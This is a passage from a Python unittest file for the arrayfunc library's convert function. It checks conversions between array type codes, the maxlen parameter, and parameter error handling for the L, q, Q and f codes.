testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_06(self):
"""Test convert for basic operation in array code L - Convert to array code I.
"""
outputtest = 'I'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_07(self):
"""Test convert for basic operation in array code L - Convert to array code l.
"""
outputtest = 'l'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_08(self):
"""Test convert for basic operation in array code L - Convert to array code L.
"""
outputtest = 'L'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_09(self):
"""Test convert for basic operation in array code L - Convert to array code q.
"""
outputtest = 'q'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_10(self):
"""Test convert for basic operation in array code L - Convert to array code Q.
"""
outputtest = 'Q'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_11(self):
"""Test convert for basic operation in array code L - Convert to array code f.
"""
outputtest = 'f'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0.0, len(data)))
arrayfunc.convert(data, dataout)
# Both parameters to assertEqual must be floating point in order
# for the floating point comparison to use FloatassertEqual.
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, float(dataitem))
########################################################
def test_convert_ops_12(self):
"""Test convert for basic operation in array code L - Convert to array code d.
"""
outputtest = 'd'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0.0, len(data)))
arrayfunc.convert(data, dataout)
# Both parameters to assertEqual must be floating point in order
# for the floating point comparison to use FloatassertEqual.
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, float(dataitem))
########################################################
def test_convert_ops_13(self):
"""Test convert for basic operation in array code L - Test maxlen parameter.
"""
outputtest = 'l'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
limlen = len(dataout) // 2
# Save the second part of the output array.
originalout = dataout[limlen:]
arrayfunc.convert(data, dataout, maxlen=limlen)
# The first part of the output should be converted.
converted = dataout[:limlen]
# This data should be converted.
for dataitem, dataoutitem in zip(data[:limlen], dataout[:limlen]):
self.assertEqual(dataoutitem, dataitem)
# This data should be unchanged.
for dataitem, dataoutitem in zip(originalout, dataout[limlen:]):
self.assertEqual(dataoutitem, dataitem)
##############################################################################
##############################################################################
class convert_params_L(unittest.TestCase):
"""Test for basic parameter function.
param_template
"""
########################################################
def setUp(self):
"""Initialise.
"""
self.TypeCode = 'L'
self.zerodata = array.array(self.TypeCode, [])
########################################################
def test_convert_params_01(self):
"""Test convert for parameters in array code L - Zero length array.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, len(self.zerodata)))
with self.assertRaises(IndexError):
arrayfunc.convert(self.zerodata, dataout)
########################################################
def test_convert_params_02(self):
"""Test convert for parameters in array code L - Unequal array length.
"""
testvals = TestData.TestLimits(self.TypeCode, self.TypeCode)
data = array.array(self.TypeCode, testvals)
dataout = array.array(self.TypeCode, itertools.repeat(0, len(data) // 2))
with self.assertRaises(IndexError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_params_03(self):
"""Test convert for parameters in array code L - Invalid input array data type.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert(99, dataout)
########################################################
def test_convert_params_04(self):
"""Test convert for parameters in array code L - Invalid output array data type.
"""
data = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert(data, 99)
########################################################
def test_convert_params_05(self):
"""Test convert for parameters in array code L - All parameters missing.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert()
########################################################
def test_convert_params_06(self):
"""Test convert for parameters in array code L - Second parameter missing.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert()
########################################################
def test_convert_params_07(self):
"""Test convert for parameters in array code L - Too many parameters.
"""
outputtest = 'b'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
with self.assertRaises(TypeError):
arrayfunc.convert(data, dataout, 2, maxlen=500)
##############################################################################
##############################################################################
class convert_q(unittest.TestCase):
"""Test for basic convert function.
op_template
"""
##############################################################################
def FloatassertEqual(self, expecteditem, dataoutitem, msg=None):
"""This function is patched into assertEqual to allow testing for
the floating point special values NaN, Inf, and -Inf.
"""
# NaN cannot be compared using normal means.
if math.isnan(dataoutitem) and math.isnan(expecteditem):
pass
# Anything else can be compared normally.
else:
if not math.isclose(expecteditem, dataoutitem, rel_tol=0.01, abs_tol=0.0):
raise self.failureException('%0.3f != %0.3f' % (expecteditem, dataoutitem))
########################################################
def setUp(self):
"""Initialise.
"""
self.addTypeEqualityFunc(float, self.FloatassertEqual)
self.TypeCode = 'q'
########################################################
def test_convert_ops_01(self):
"""Test convert for basic operation in array code q - Convert to array code b.
"""
outputtest = 'b'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_02(self):
"""Test convert for basic operation in array code q - Convert to array code B.
"""
outputtest = 'B'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_03(self):
"""Test convert for basic operation in array code q - Convert to array code h.
"""
outputtest = 'h'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_04(self):
"""Test convert for basic operation in array code q - Convert to array code H.
"""
outputtest = 'H'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_05(self):
"""Test convert for basic operation in array code q - Convert to array code i.
"""
outputtest = 'i'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_06(self):
"""Test convert for basic operation in array code q - Convert to array code I.
"""
outputtest = 'I'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_07(self):
"""Test convert for basic operation in array code q - Convert to array code l.
"""
outputtest = 'l'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_08(self):
"""Test convert for basic operation in array code q - Convert to array code L.
"""
outputtest = 'L'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_09(self):
"""Test convert for basic operation in array code q - Convert to array code q.
"""
outputtest = 'q'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_10(self):
"""Test convert for basic operation in array code q - Convert to array code Q.
"""
outputtest = 'Q'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_11(self):
"""Test convert for basic operation in array code q - Convert to array code f.
"""
outputtest = 'f'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0.0, len(data)))
arrayfunc.convert(data, dataout)
# Both parameters to assertEqual must be floating point in order
# for the floating point comparison to use FloatassertEqual.
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, float(dataitem))
########################################################
def test_convert_ops_12(self):
"""Test convert for basic operation in array code q - Convert to array code d.
"""
outputtest = 'd'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0.0, len(data)))
arrayfunc.convert(data, dataout)
# Both parameters to assertEqual must be floating point in order
# for the floating point comparison to use FloatassertEqual.
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, float(dataitem))
########################################################
def test_convert_ops_13(self):
"""Test convert for basic operation in array code q - Test maxlen parameter.
"""
outputtest = 'l'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
limlen = len(dataout) // 2
# Save the second part of the output array.
originalout = dataout[limlen:]
arrayfunc.convert(data, dataout, maxlen=limlen)
# The first part of the output should be converted.
converted = dataout[:limlen]
# This data should be converted.
for dataitem, dataoutitem in zip(data[:limlen], dataout[:limlen]):
self.assertEqual(dataoutitem, dataitem)
# This data should be unchanged.
for dataitem, dataoutitem in zip(originalout, dataout[limlen:]):
self.assertEqual(dataoutitem, dataitem)
##############################################################################
##############################################################################
class convert_params_q(unittest.TestCase):
"""Test for basic parameter function.
param_template
"""
########################################################
def setUp(self):
"""Initialise.
"""
self.TypeCode = 'q'
self.zerodata = array.array(self.TypeCode, [])
########################################################
def test_convert_params_01(self):
"""Test convert for parameters in array code q - Zero length array.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, len(self.zerodata)))
with self.assertRaises(IndexError):
arrayfunc.convert(self.zerodata, dataout)
########################################################
def test_convert_params_02(self):
"""Test convert for parameters in array code q - Unequal array length.
"""
testvals = TestData.TestLimits(self.TypeCode, self.TypeCode)
data = array.array(self.TypeCode, testvals)
dataout = array.array(self.TypeCode, itertools.repeat(0, len(data) // 2))
with self.assertRaises(IndexError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_params_03(self):
"""Test convert for parameters in array code q - Invalid input array data type.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert(99, dataout)
########################################################
def test_convert_params_04(self):
"""Test convert for parameters in array code q - Invalid output array data type.
"""
data = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert(data, 99)
########################################################
def test_convert_params_05(self):
"""Test convert for parameters in array code q - All parameters missing.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert()
########################################################
def test_convert_params_06(self):
"""Test convert for parameters in array code q - Second parameter missing.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert()
########################################################
def test_convert_params_07(self):
"""Test convert for parameters in array code q - Too many parameters.
"""
outputtest = 'b'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
with self.assertRaises(TypeError):
arrayfunc.convert(data, dataout, 2, maxlen=500)
##############################################################################
##############################################################################
class convert_Q(unittest.TestCase):
"""Test for basic convert function.
op_template
"""
##############################################################################
def FloatassertEqual(self, expecteditem, dataoutitem, msg=None):
"""This function is patched into assertEqual to allow testing for
the floating point special values NaN, Inf, and -Inf.
"""
# NaN cannot be compared using normal means.
if math.isnan(dataoutitem) and math.isnan(expecteditem):
pass
# Anything else can be compared normally.
else:
if not math.isclose(expecteditem, dataoutitem, rel_tol=0.01, abs_tol=0.0):
raise self.failureException('%0.3f != %0.3f' % (expecteditem, dataoutitem))
########################################################
def setUp(self):
"""Initialise.
"""
self.addTypeEqualityFunc(float, self.FloatassertEqual)
self.TypeCode = 'Q'
########################################################
def test_convert_ops_01(self):
"""Test convert for basic operation in array code Q - Convert to array code b.
"""
outputtest = 'b'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_02(self):
"""Test convert for basic operation in array code Q - Convert to array code B.
"""
outputtest = 'B'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_03(self):
"""Test convert for basic operation in array code Q - Convert to array code h.
"""
outputtest = 'h'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_04(self):
"""Test convert for basic operation in array code Q - Convert to array code H.
"""
outputtest = 'H'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_05(self):
"""Test convert for basic operation in array code Q - Convert to array code i.
"""
outputtest = 'i'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_06(self):
"""Test convert for basic operation in array code Q - Convert to array code I.
"""
outputtest = 'I'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_07(self):
"""Test convert for basic operation in array code Q - Convert to array code l.
"""
outputtest = 'l'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_08(self):
"""Test convert for basic operation in array code Q - Convert to array code L.
"""
outputtest = 'L'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_09(self):
"""Test convert for basic operation in array code Q - Convert to array code q.
"""
outputtest = 'q'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_10(self):
"""Test convert for basic operation in array code Q - Convert to array code Q.
"""
outputtest = 'Q'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_11(self):
"""Test convert for basic operation in array code Q - Convert to array code f.
"""
outputtest = 'f'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0.0, len(data)))
arrayfunc.convert(data, dataout)
# Both parameters to assertEqual must be floating point in order
# for the floating point comparison to use FloatassertEqual.
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, float(dataitem))
########################################################
def test_convert_ops_12(self):
"""Test convert for basic operation in array code Q - Convert to array code d.
"""
outputtest = 'd'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0.0, len(data)))
arrayfunc.convert(data, dataout)
# Both parameters to assertEqual must be floating point in order
# for the floating point comparison to use FloatassertEqual.
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, float(dataitem))
########################################################
def test_convert_ops_13(self):
"""Test convert for basic operation in array code Q - Test maxlen parameter.
"""
outputtest = 'l'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
limlen = len(dataout) // 2
# Save the second part of the output array.
originalout = dataout[limlen:]
arrayfunc.convert(data, dataout, maxlen=limlen)
# The first part of the output should be converted.
converted = dataout[:limlen]
# This data should be converted.
for dataitem, dataoutitem in zip(data[:limlen], dataout[:limlen]):
self.assertEqual(dataoutitem, dataitem)
# This data should be unchanged.
for dataitem, dataoutitem in zip(originalout, dataout[limlen:]):
self.assertEqual(dataoutitem, dataitem)
##############################################################################
##############################################################################
class convert_params_Q(unittest.TestCase):
"""Test for basic parameter function.
param_template
"""
########################################################
def setUp(self):
"""Initialise.
"""
self.TypeCode = 'Q'
self.zerodata = array.array(self.TypeCode, [])
########################################################
def test_convert_params_01(self):
"""Test convert for parameters in array code Q - Zero length array.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, len(self.zerodata)))
with self.assertRaises(IndexError):
arrayfunc.convert(self.zerodata, dataout)
########################################################
def test_convert_params_02(self):
"""Test convert for parameters in array code Q - Unequal array length.
"""
testvals = TestData.TestLimits(self.TypeCode, self.TypeCode)
data = array.array(self.TypeCode, testvals)
dataout = array.array(self.TypeCode, itertools.repeat(0, len(data) // 2))
with self.assertRaises(IndexError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_params_03(self):
"""Test convert for parameters in array code Q - Invalid input array data type.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert(99, dataout)
########################################################
def test_convert_params_04(self):
"""Test convert for parameters in array code Q - Invalid output array data type.
"""
data = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert(data, 99)
########################################################
def test_convert_params_05(self):
"""Test convert for parameters in array code Q - All parameters missing.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert()
########################################################
def test_convert_params_06(self):
"""Test convert for parameters in array code Q - Second parameter missing.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert()
########################################################
def test_convert_params_07(self):
"""Test convert for parameters in array code Q - Too many parameters.
"""
outputtest = 'b'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
with self.assertRaises(TypeError):
arrayfunc.convert(data, dataout, 2, maxlen=500)
##############################################################################
##############################################################################
class convert_f(unittest.TestCase):
"""Test for basic convert function.
op_template
"""
##############################################################################
def FloatassertEqual(self, expecteditem, dataoutitem, msg=None):
"""This function is patched into assertEqual to allow testing for
the floating point special values NaN, Inf, and -Inf.
"""
# NaN cannot be compared using normal means.
if math.isnan(dataoutitem) and math.isnan(expecteditem):
pass
# Anything else can be compared normally.
else:
if not math.isclose(expecteditem, dataoutitem, rel_tol=0.01, abs_tol=0.0):
raise self.failureException('%0.3f != %0.3f' % (expecteditem, dataoutitem))
########################################################
def setUp(self):
"""Initialise.
"""
self.addTypeEqualityFunc(float, self.FloatassertEqual)
self.TypeCode = 'f'
########################################################
def test_convert_ops_01(self):
"""Test convert for basic operation in array code f - Convert to array code b.
"""
outputtest = 'b'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_02(self):
"""Test convert for basic operation in array code f - Convert to array code B.
"""
outputtest = 'B'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_03(self):
"""Test convert for basic operation in array code f - Convert to array code h.
"""
outputtest = 'h'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_04(self):
"""Test convert for basic operation in array code f - Convert to array code H.
"""
outputtest = 'H'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_05(self):
"""Test convert for basic operation in array code f - Convert to array code i.
"""
outputtest = 'i'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_06(self):
"""Test convert for basic operation in array code f - Convert to array code I.
"""
outputtest = 'I'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_07(self):
"""Test convert for basic operation in array code f - Convert to array code l.
"""
outputtest = 'l'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_08(self):
"""Test convert for basic operation in array code f - Convert to array code L.
"""
outputtest = 'L'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_09(self):
"""Test convert for basic operation in array code f - Convert to array code q.
"""
outputtest = 'q'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_10(self):
"""Test convert for basic operation in array code f - Convert to array code Q.
"""
outputtest = 'Q'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
arrayfunc.convert(data, dataout)
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, dataitem)
########################################################
def test_convert_ops_11(self):
"""Test convert for basic operation in array code f - Convert to array code f.
"""
outputtest = 'f'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0.0, len(data)))
arrayfunc.convert(data, dataout)
# Both parameters to assertEqual must be floating point in order
# for the floating point comparison to use FloatassertEqual.
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, float(dataitem))
########################################################
def test_convert_ops_12(self):
"""Test convert for basic operation in array code f - Convert to array code d.
"""
outputtest = 'd'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0.0, len(data)))
arrayfunc.convert(data, dataout)
# Both parameters to assertEqual must be floating point in order
# for the floating point comparison to use FloatassertEqual.
for dataitem, dataoutitem in zip(data, dataout):
self.assertEqual(dataoutitem, float(dataitem))
########################################################
def test_convert_ops_13(self):
"""Test convert for basic operation in array code f - Test maxlen parameter.
"""
outputtest = 'l'
testvals = TestData.TestLimits(self.TypeCode, outputtest)
data = array.array(self.TypeCode, testvals)
dataout = array.array(outputtest, itertools.repeat(0, len(data)))
limlen = len(dataout) // 2
# Save the second part of the output array.
originalout = dataout[limlen:]
arrayfunc.convert(data, dataout, maxlen=limlen)
# The first part of the output should be converted.
converted = dataout[:limlen]
# This data should be converted.
for dataitem, dataoutitem in zip(data[:limlen], dataout[:limlen]):
self.assertEqual(dataoutitem, dataitem)
# This data should be unchanged.
for dataitem, dataoutitem in zip(originalout, dataout[limlen:]):
self.assertEqual(dataoutitem, dataitem)
##############################################################################
##############################################################################
class convert_params_f(unittest.TestCase):
"""Test for basic parameter function.
param_template
"""
########################################################
def setUp(self):
"""Initialise.
"""
self.TypeCode = 'f'
self.zerodata = array.array(self.TypeCode, [])
########################################################
def test_convert_params_01(self):
"""Test convert for parameters in array code f - Zero length array.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, len(self.zerodata)))
with self.assertRaises(IndexError):
arrayfunc.convert(self.zerodata, dataout)
########################################################
def test_convert_params_02(self):
"""Test convert for parameters in array code f - Unequal array length.
"""
testvals = TestData.TestLimits(self.TypeCode, self.TypeCode)
data = array.array(self.TypeCode, testvals)
dataout = array.array(self.TypeCode, itertools.repeat(0, len(data) // 2))
with self.assertRaises(IndexError):
arrayfunc.convert(data, dataout)
########################################################
def test_convert_params_03(self):
"""Test convert for parameters in array code f - Invalid input array data type.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert(99, dataout)
########################################################
def test_convert_params_04(self):
"""Test convert for parameters in array code f - Invalid output array data type.
"""
data = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert(data, 99)
########################################################
def test_convert_params_05(self):
"""Test convert for parameters in array code f - All parameters missing.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
with self.assertRaises(TypeError):
arrayfunc.convert()
########################################################
def test_convert_params_06(self):
"""Test convert for parameters in array code f - Second parameter missing.
"""
dataout = array.array(self.TypeCode, itertools.repeat(0, 100))
